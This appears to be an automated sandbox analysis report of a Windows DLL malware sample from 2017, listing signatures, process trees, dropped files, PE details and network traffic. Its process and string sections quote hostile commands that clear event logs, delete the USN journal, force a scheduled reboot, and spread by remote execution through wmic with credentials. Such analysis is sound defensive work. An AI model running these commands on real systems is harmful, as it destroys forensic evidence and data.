Source: rundll32.exeBinary or memory string: -h "%ws:%ws"%dkernel32.dllIsWow64Process\\.\pipe\%ws"%ws" %wsiphlpapi.dllGetExtendedTcpTable%u.%u.%u.%uTERMSRV/127.0.0.1localhostSeTcbPrivilegeSeShutdownPrivilegeSeDebugPrivilegeC:\Windows\/c %wsComSpec\cmd.exewevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:schtasks %ws/Create /SC once /TN "" /TR "%ws" /ST %02d:%02dat %02d:%02d %wsshutdown.exe /r /f/RU "SYSTEM" dllhost.datntdll.dllNtRaiseHardError\\.\C:\\.\PhysicalDrive0255.255.255.255%u.%u.%u.%u%s \\%s -accepteula -s -d C:\Windows\System32\rundll32.exe "C:\Windows\%s",#1 wbem\wmic.exe%s /node:"%ws" /user:"%ws" /password:"%ws" process call create "C:\Windows\System32\rundll32.exe \"C:\Windows\%s\" #1 "\\%s\admin$\\%ws\admin$\%ws
Performs an instant shutdown (NtRaiseHardError)Show sources
Source: C:\Windows\System32\rundll32.exeHard error raised: shutdown

HIPS / PFW / Operating System Protection Evasion:

barindex
Contains functionality to add an ACL to a security descriptorShow sources
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E73FD GetProcessHeap,GetProcessHeap,HeapAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,ConnectNamedPipe,PeekNamedPipe,Sleep,GetProcessHeap,HeapAlloc,ReadFile,StrChrW,GetProcessHeap,HeapFree,FlushFileBuffers,DisconnectNamedPipe,CloseHandle,1_2_011E73FD
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: rundll32.exeBinary or memory string: Progman
Source: rundll32.exeBinary or memory string: Program Manager
Source: rundll32.exeBinary or memory string: Shell_TrayWnd

Anti Debugging:

barindex
Contains functionality to register its own exception handlerShow sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmpCode function: 5_2_00F64CD8 SetUnhandledExceptionFilter,5_2_00F64CD8
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmpCode function: 5_2_00F65F8E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00F65F8E
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmpCode function: 5_2_00F64AB6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00F64AB6
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmpCode function: 5_1_00F64CD8 SetUnhandledExceptionFilter,5_1_00F64CD8
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmpCode function: 5_1_00F65F8E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_1_00F65F8E
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmpCode function: 5_1_00F64AB6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_1_00F64AB6
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Windows\System32\rundll32.exeSystem information queried: KernelDebuggerInformation
Contains functionality to check if a debugger is running (IsDebuggerPresent)Show sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmpCode function: 5_2_00F65F8E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00F65F8E
Contains functionality to dynamically determine API callsShow sources
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E9367 VirtualProtect,LoadLibraryA,GetProcAddress,VirtualProtect,1_2_011E9367
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011EA073 GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,1_2_011EA073
Enables debug privilegesShow sources
Source: C:\Windows\System32\rundll32.exeProcess token adjusted: Debug
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmpProcess token adjusted: Debug

Malware Analysis System Evasion:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E1973 PathCombineW,FindFirstFileW,StrStrIW,WaitForSingleObject,PathCombineW,StrStrIW,PathFindExtensionW,wsprintfW,StrStrIW,FindNextFileW,FindClose,1_2_011E1973
Program exit pointsShow sources
Source: C:\Windows\System32\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_1-5851
Source: C:\Windows\System32\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_1-5775
Source: C:\Windows\System32\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_1-5906
Queries a list of all running processesShow sources
Source: C:\Windows\System32\rundll32.exeProcess information queried: ProcessInformation
Contains long sleeps (>= 3 min)Show sources
Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: -3000
Enumerates the file systemShow sources
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files\Adobe\Reader 11.0\Reader\AcroExt\locales\
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files\Adobe\Reader 11.0\Reader\AcroExt\
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files\Adobe\Reader 11.0\Reader\
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files\Adobe\
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files\Adobe\Reader 11.0\
Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files\Adobe\Reader 11.0\Esl\
Found decision node followed by non-executed suspicious APIsShow sources
Source: C:\Windows\System32\rundll32.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_1-7255
Found dropped PE file which has not been started or loadedShow sources
Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp
Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Windows\dllhost.dat
Found evasive API chain (may stop execution after checking a module file name)Show sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmpEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_5-3844
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\System32\loaddll32.exe TID: 2720Thread sleep time: -3000s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2792Thread sleep time: -1000s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2728Thread sleep time: -2700000s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2852Thread sleep time: -1200000s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2728Thread sleep time: -900000s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2852Thread sleep time: -1110s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2776Thread sleep time: -540000s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2852Thread sleep time: -1110s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2852Thread sleep time: -1110s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2856Thread sleep time: -3540000s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2728Thread sleep time: -3000s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2852Thread sleep time: -1110s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2848Thread sleep time: -10000s >= -60s
Source: C:\Windows\System32\rundll32.exe TID: 2776Thread sleep time: -180000s >= -60s
Queries disk information (often used to detect virtual machines)Show sources
Source: C:\Windows\System32\rundll32.exeFile opened: PhysicalDrive0

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Extensive use of GetProcAddress (often used to hide API calls)Show sources
Source: C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmpCode function: 5_2_00F62566 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_00F62566

Language, Device and Operating System Detection:

barindex
Contains functionality to create pipes for IPCShow sources
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E73FD GetProcessHeap,GetProcessHeap,HeapAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,ConnectNamedPipe,PeekNamedPipe,Sleep,GetProcessHeap,HeapAlloc,ReadFile,StrChrW,GetProcessHeap,HeapFree,FlushFileBuffers,DisconnectNamedPipe,CloseHandle,1_2_011E73FD
Contains functionality to query local / system timeShow sources
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E84DF GetLocalTime,GetSystemDirectoryW,PathAppendW,wsprintfW,wsprintfW,1_2_011E84DF
Contains functionality to query windows versionShow sources
Source: C:\Windows\System32\rundll32.exeCode function: 1_2_011E7DEB #1,WSAStartup,InitializeCriticalSection,CreateThread,CreateThread,SetThreadToken,ResumeThread,GetLastError,CloseHandle,SetLastError,CreateThread,SetThreadToken,ResumeThread,WaitForSingleObject,GetLastError,CloseHandle,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,GetProcessHeap,HeapFree,Sleep,Sleep,Sleep,memset,GetVersionExW,ExitProcess,Sleep,wsprintfW,GetModuleHandleA,GetProcAddress,NtRaiseHardError,InitiateSystemShutdownExW,ExitWindowsEx,1_2_011E7DEB
Queries the cryptographic machine GUIDShow sources
Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Behavior Graph

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behavior_graph main Behavior Graph ID: 309071 Sample:  abc.dll Startdate:  12/07/2017 Architecture:  WINDOWS Score:  100 0 loaddll32.exe main->0      started     9821reducedSig Signatures exceeded maximum capacity for this level. 11 signatures have been hidden. 9821sig Clears the journal log 9811sig Clears the windows event log 9881sig Connects to many different private IPs (likely to spread or exploit) 9823sig Clears the journal log 9865sig Contains functionality to dump credential hashes (LSA Dump) 9828sig Clears the journal log d1e290428reduced Connected ips exeeded maximum capacity for this level. 2 connected ips have been hidden. d1e290428 192.168.1.1, unknown unknown d1e290429 192.168.1.0, unknown unknown d1e290430 192.168.1.2, 80 unknown unknown d1e40558 F915.tmp, PE32 d1e40585 dllhost.dat, PE32 1 rundll32.exe 4 0->1      started     1->9821reducedSig 1->9821sig 1->9811sig 1->9881sig 1->d1e290428reduced 1->d1e290428 1->d1e290429 1->d1e290430 1->d1e40558 dropped 1->d1e40585 dropped 3 cmd.exe 1->3      started     5 F915.tmp 1->5      started     8 cmd.exe 1->8      started     3->9823sig 6 schtasks.exe 3->6      started     5->9865sig 8->9828sig 10 wevtutil.exe 8->10      started     11 wevtutil.exe 8->11      started     process0 process1 dnsIp1 fileCreated1 signatures1 process3 signatures3 process6 fileCreated0

Yara Overview

No Yara matches

Screenshot

windows-stand

Startup

  • system is w7_1
  • loaddll32.exe (PID: 2716 cmdline: loaddll32.exe 'C:\Users\user\Desktop\abc.dll' MD5: D2792A55032CFE825F07DCD4BEC5F40F)
    • rundll32.exe (PID: 2724 cmdline: rundll32.exe C:\Users\user\Desktop\abc.dll,#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
      • cmd.exe (PID: 2768 cmdline: /c schtasks /Create /SC once /TN '' /TR 'C:\Windows\system32\shutdown.exe /r /f' /ST 23:11 MD5: AD7B9C14083B52BC532FBA5948342B98)
        • schtasks.exe (PID: 2824 cmdline: schtasks /Create /SC once /TN '' /TR 'C:\Windows\system32\shutdown.exe /r /f' /ST 23:11 MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • F915.tmp (PID: 2800 cmdline: 'C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp' \\.\pipe\{5F8C413D-F226-48C7-A40D-408B0F9CF420} MD5: 2813D34F6197EB4DF42C886EC7F234A1)
      • cmd.exe (PID: 2868 cmdline: /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C: MD5: AD7B9C14083B52BC532FBA5948342B98)
        • wevtutil.exe (PID: 2888 cmdline: wevtutil cl Setup MD5: 81538B795F922B8DA6FD897EFB04B5EE)
        • wevtutil.exe (PID: 2948 cmdline: wevtutil cl System MD5: 81538B795F922B8DA6FD897EFB04B5EE)
        • wevtutil.exe (PID: 2960 cmdline: wevtutil cl Security MD5: 81538B795F922B8DA6FD897EFB04B5EE)
        • wevtutil.exe (PID: 2972 cmdline: wevtutil cl Application MD5: 81538B795F922B8DA6FD897EFB04B5EE)
        • fsutil.exe (PID: 2988 cmdline: fsutil usn deletejournal /D C: MD5: B4834F08230A2EB7F498DE4E5B6AB814)
  • cleanup

Created / dropped Files

File PathType and HashesMalicious
C:
  • Type: data
  • MD5: 50CF2382E783ADAA465FEEDD1DD36D11
  • SHA: A03E1F69DDBD94A6697E5447AD0B3D76381FEDF8
  • SHA-256: 3A954CE94ECA2286E3524407DB360CC9D809D8A861BC3E9EBA00715E044A33B5
  • SHA-512: D9094F9E2C8A44BE1CB966C5121CCD645E1A6A7F7339D28B4CB925A843AED8182937421BA6445C78E1D70793C5A9721E1B56AE0728A248AB17B73D6B77211E32
true
C:\README.TXT
  • Type: data
  • MD5: DEC0F31784A36435A9A8A2F4419E29C4
  • SHA: 131E51447D2CB7BD1D64C5EA6C78752D946E3558
  • SHA-256: C61506A25D135D19DEA2BE38718A800DA9821395EAD5AE356723D2BF089591CB
  • SHA-512: 7CE28F4D01E449AB61F7D6FB38264223EBC2C0FDA91D3E60AC6C3F21D654B67AEAC8B13097850779E77C71EA48EA01579B983C22B88150FB2335D5E9B79D868E
true
C:\Users\LUKETA~1\AppData\Local\Temp\F915.tmp
  • Type: PE32 executable for MS Windows (console) Intel 80386 32-bit
  • MD5: B8DB74A05685A45BB1257EF3AD87C0AE
  • SHA: 8C23DD9DCC1989BEC7C2D026216DECD1FAE674C5
  • SHA-256: 225E05DC9B98D7A7D63CDE112D6F879FC0C7124FB564746B700DAC839653C2B9
  • SHA-512: D085682BBCCC42160C86FADAA45181A0859C4BAF1900C3C04338571672CAB57A610887B9D29F87CC49B604F8F0544A82C0096E41E58D15733E7FC3BC82A81C5C
true
C:\Users\user\Desktop\abc.dll
  • Type: data
  • MD5: 9A7FFE65E0912F9379BA6E8E0B079FDE
  • SHA: 532BEA84179E2336CAED26E31805CEAA7EEC53DD
  • SHA-256: 4B336C3CC9B6C691FE581077E3DD9EA7DF3BF48F79E35B05CF87E079EC8E0651
  • SHA-512: E8EBF30488B9475529D3345A00C002FE44336718AF8BC99879018982BBC1172FC77F9FEE12C541BAB9665690092709EF5F847B40201782732C717C331BB77C31
false
C:\Windows\dllhost.dat
  • Type: PE32 executable for MS Windows (console) Intel 80386 32-bit
  • MD5: AEEE996FD3484F28E5CD85FE26B6BDCD
  • SHA: CD23B7C9E0EDEF184930BC8E0CA2264F0608BCB3
  • SHA-256: F8DBABDFA03068130C277CE49C60E35C029FF29D9E3C74C362521F3FB02670D5
  • SHA-512: E7C0B64CA5933C301F46DC3B3FD095BCC48011D8741896571BF93AF909F54A6B21096D5F66B4900020DCAECE6AB9B0E1D1C65791B8B5943D2E4D5BAB28340E6F
false
\Device\Harddisk0\DR0
  • Type: partition 2: ID=0x7, starthead 223, startsector 206848, 41734144 sectors, code offset 0x31
  • MD5: 2AAE6A1A720CFD62732FA7D13131D616
  • SHA: 4E43CF175A371E574D5FF21FACF777DB6E520652
  • SHA-256: 2E24E0203DD25DDDD95B1B574915AF282C9CF5AF42B7FFA46E94A855C1A3C386
  • SHA-512: 39A8B58044A950A3EC44F43D4B45C42E62E480F4450AC9E6EE1611A5703BB69908654078936C3E71E6011D759B08EBE64D94AD72323C0E68A7161ED8AC993D67
true
unknown
  • Type: ASCII text, with CRLF line terminators
  • MD5: F7B0D39E5B2B15C4CA6ACDAFE1A3CB9C
  • SHA: BAE8F0CC04A7E7218E1B57D84F784DB9246E6606
  • SHA-256: C3CD57E6E2D2C980B50245BE712785DCB0721A812C317292DAA7E99BA32A7362
  • SHA-512: A078E25F04800918B3E80490C64AEAA3B88E88DDAA6C8F963E6D0DFDC26BF8BE7440F3EB27253A5693DB4604604DB6BA3E42BB47B840CCAA47DE1428E66365A4
true

Contacted Domains/Contacted IPs

Contacted Domains

No contacted domains info

Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPCountryFlagASNASN NameMalicious
192.168.1.1unknown
unknownunknownfalse
192.168.1.0unknown
unknownunknownfalse
192.168.1.2unknown
unknownunknownfalse
192.168.1.16unknown
unknownunknownfalse
192.168.1.13unknown
unknownunknownfalse

Static File Info

General

File type:PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit
TrID:
  • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
  • Generic Win/DOS Executable (2004/3) 0.20%
  • DOS Executable Generic (2002/1) 0.20%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:abc.dll
File size:362360
MD5:71b6a493388e7d0b40c83ce903bc6b04
SHA1:34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d
SHA256:027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745
SHA512:072205eca5099d9269f358fe534b370ff21a4f12d7938d6d2e2713f69310f0698e53b8aff062849f0b2a521f68bee097c1840993825d2a5a3aa8cf4145911c6f
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8/.jV|.jV|.jV|&$.|.jV|...|.jV|...|.jV|...|.jV|...|.jV|.jW|.jV|...|.jV|...|.jV|...|.jV|Rich.jV|................PE..L...\(FY...

File Icon

Static PE Info

General

Entrypoint:0x10007d39
Entrypoint Section:.text
Digitally signed:true
Imagebase:0x10000000
Subsystem:windows cui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
Time Stamp:0x5946285C [Sun Jun 18 07:14:36 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:1
File Version Major:5
File Version Minor:1
Subsystem Version Major:5
Subsystem Version Minor:1
Import Hash:52dd60b5f3c9e2f17c2e303e8c8d4eab

Authenticode Signature

Signature Valid:false
Signature Issuer:CN=Microsoft Code Signing PCA, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Signature Validation Error:The digital signature of the object did not verify
Error Number:-2146869232
Not Before, Not After
  • 12/7/2009 11:40:29 PM 3/7/2011 11:40:29 PM
Subject Chain
  • CN=Microsoft Corporation, OU=MOPR, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Version:3
Thumbprint:9617094A1CFB59AE7C1F7DFDB6739E4E7C40508F
Serial:6101CF3E00000000000F

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+0Ch]
dec eax
jne 0E4F04A1h
mov eax, dword ptr [ebp+08h]
push eax
mov dword ptr [1001F120h], eax
call dword ptr [1000D0E0h]
xor eax, eax
inc eax
pop ebp
retn 000Ch
push ebp
mov ebp, esp
call 0E4F12FBh
mov ecx, dword ptr [ebp+08h]
test ecx, ecx
je 0E4F0494h
mov dword ptr [ecx], eax
xor eax, eax
pop ebp
retn 0004h
push ebp
mov ebp, esp
sub esp, 00000618h
push esi
xor esi, esi
cmp dword ptr [1001F0FCh], esi
je 0E4F04F0h
cmp dword ptr [1001F11Ch], esi
je 0E4F04E8h
mov eax, dword ptr [ebp+08h]
lea edx, dword ptr [eax+02h]
mov cx, word ptr [eax]
add eax, 02h
cmp cx, si
jne 0E4F0487h
sub eax, edx
sar eax, 1
push eax
push dword ptr [ebp+08h]
push 100140D0h
call 0E4F1DAEh
test eax, eax
je 0E4F04C1h
push 00000BB8h
call dword ptr [1000D188h]
lea eax, dword ptr [ebp-00000618h]
push eax
call 0E4F09ECh
test eax, eax
je 0E4F04A6h
lea eax, dword ptr [ebp-00000618h]
push eax
call dword ptr [1000D228h]
test eax, eax
je 0E4F0495h
xor esi, esi
inc esi
mov eax, esi
pop esi
leave
retn 0004h
int3
int3
int3
push ebp
mov ebp, esp
mov eax, 00004A18h
call 0E4F2B8Dh

Data Directories

NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x155100x36.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT0x145f00x118.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE0x200000x3c738.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
IMAGE_DIRECTORY_ENTRY_SECURITY0x570000x1778.rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC0x5d0000x844.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x00x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0xd0000x2c8.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

Sections

NameVirtual AddressVirtual SizeRaw SizeEntropyXored PEZLIB ComplexityFile TypeCharacteristics
.text0x10000xbd630xbe00False0.597512335526ump; data6.54653060932IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata0xd0000x85460x8600False0.615875699627ump; data6.99212929533IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data0x160000x9b4a0x5200False0.457459984756ump; data5.42698913823IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc0x200000x3c7380x3c800False0.999495577221ump; data7.9982879669IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc0x5d0000xc020xe00False0.522321428571ump; data4.77168126134IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

NameRVASizeTypeLanguageCountry
RT_RCDATA0x200e80x617eump; dataEnglishUnited States
RT_RCDATA0x262680x6b22ump; dataEnglishUnited States
RT_RCDATA0x2cd8c0x2ec75ump; dataEnglishUnited States
RT_RCDATA0x5ba040xd33ump; dataEnglishUnited States

Imports

DLLImport
KERNEL32.dllConnectNamedPipe, GetModuleHandleW, CreateNamedPipeW, TerminateThread, DisconnectNamedPipe, FlushFileBuffers, GetTempPathW, GetProcAddress, DeleteFileW, FreeLibrary, GlobalAlloc, LoadLibraryW, GetComputerNameExW, GlobalFree, ExitProcess, GetVersionExW, GetModuleFileNameW, DisableThreadLibraryCalls, ResumeThread, GetEnvironmentVariableW, GetFileSize, SetFilePointer, SetLastError, LoadResource, GetCurrentThread, OpenProcess, GetSystemDirectoryW, SizeofResource, GetLocalTime, Process32FirstW, LockResource, Process32NextW, GetModuleHandleA, lstrcatW, CreateToolhelp32Snapshot, GetCurrentProcess, VirtualFree, VirtualAlloc, LoadLibraryA, VirtualProtect, WideCharToMultiByte, GetExitCodeProcess, WaitForMultipleObjects, CreateProcessW, PeekNamedPipe, GetTempFileNameW, InterlockedExchange, LeaveCriticalSection, MultiByteToWideChar, CreateFileA, GetTickCount, CreateThread, LocalFree, FindNextFileW, CreateFileMappingW, LocalAlloc, FindClose, GetFileSizeEx, CreateFileW, Sleep, FlushViewOfFile, GetLogicalDrives, WaitForSingleObject, GetDriveTypeW, UnmapViewOfFile, MapViewOfFile, FindFirstFileW, CloseHandle, DeviceIoControl, GetLastError, GetSystemDirectoryA, ReadFile, WriteFile, GetProcessHeap, InitializeCriticalSection, HeapReAlloc, GetWindowsDirectoryW, EnterCriticalSection, HeapFree, SetFilePointerEx, HeapAlloc, FindResourceW
USER32.dllExitWindowsEx, wsprintfA, wsprintfW
ADVAPI32.dllCryptGenRandom, CryptAcquireContextA, CryptExportKey, CryptAcquireContextW, CreateProcessAsUserW, InitiateSystemShutdownExW, DuplicateTokenEx, SetTokenInformation, GetTokenInformation, GetSidSubAuthorityCount, OpenThreadToken, GetSidSubAuthority, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetThreadToken, CredEnumerateW, CredFree, SetSecurityDescriptorDacl, InitializeSecurityDescriptor, CryptDestroyKey, CryptGenKey, CryptEncrypt, CryptImportKey, CryptSetKeyParam, CryptReleaseContext
SHELL32.dllCommandLineToArgvW, SHGetFolderPathW
ole32.dllCoCreateGuid, CoTaskMemFree, StringFromCLSID
CRYPT32.dllCryptStringToBinaryW, CryptBinaryToStringW, CryptDecodeObjectEx
SHLWAPI.dllPathAppendW, StrToIntW, PathFindFileNameW, PathFileExistsW, StrCmpW, StrCmpIW, StrChrW, StrCatW, StrStrW, PathFindExtensionW, PathCombineW, StrStrIW
IPHLPAPI.DLLGetIpNetTable, GetAdaptersInfo
WS2_32.dllinet_ntoa, gethostbyname, __WSAFDIsSet, ntohl, ioctlsocket, connect, inet_addr, select, recv, send, htons, closesocket, socket, WSAStartup
MPR.dllWNetOpenEnumW, WNetEnumResourceW, WNetCancelConnection2W, WNetAddConnection2W, WNetCloseEnum
NETAPI32.dllNetServerEnum, NetApiBufferFree, NetServerGetInfo
DHCPSAPI.DLLDhcpEnumSubnetClients, DhcpRpcFreeMemory, DhcpGetSubnetInfo, DhcpEnumSubnets
msvcrt.dllmalloc, _itoa, free, memset, rand, memcpy

Possible Origin

Language of compilation systemCountry where language is spokenMap
EnglishUnited States

Network Behavior

TCP Packets

TimestampSource PortDest PortSource IPDest IP
Jul 12, 2017 22:07:23.542896986 MESZ4923580192.168.1.16192.168.1.2
Jul 12, 2017 22:07:23.542942047 MESZ8049235192.168.1.2192.168.1.16
Jul 12, 2017 22:07:24.085721016 MESZ4923580192.168.1.16192.168.1.2
Jul 12, 2017 22:07:24.085777044 MESZ8049235192.168.1.2192.168.1.16
Jul 12, 2017 22:07:24.585623980 MESZ4923580192.168.1.16192.168.1.2
Jul 12, 2017 22:07:24.585654020 MESZ8049235192.168.1.2192.168.1.16
Jul 12, 2017 22:07:24.612267017 MESZ4924080192.168.1.16192.168.1.2
Jul 12, 2017 22:07:24.612302065 MESZ8049240192.168.1.2192.168.1.16
Jul 12, 2017 22:07:25.179496050 MESZ4924080192.168.1.16192.168.1.2
Jul 12, 2017 22:07:25.179527044 MESZ8049240192.168.1.2192.168.1.16
Jul 12, 2017 22:07:25.741707087 MESZ4924080192.168.1.16192.168.1.2
Jul 12, 2017 22:07:25.741758108 MESZ8049240192.168.1.2192.168.1.16
Jul 12, 2017 22:07:26.020550966 MESZ4925980192.168.1.16192.168.1.2
Jul 12, 2017 22:07:26.020584106 MESZ8049259192.168.1.2192.168.1.16
Jul 12, 2017 22:07:26.538785934 MESZ4925980192.168.1.16192.168.1.2
Jul 12, 2017 22:07:26.538822889 MESZ8049259192.168.1.2192.168.1.16
Jul 12, 2017 22:07:27.038621902 MESZ4925980192.168.1.16192.168.1.2
Jul 12, 2017 22:07:27.038667917 MESZ8049259192.168.1.2192.168.1.16
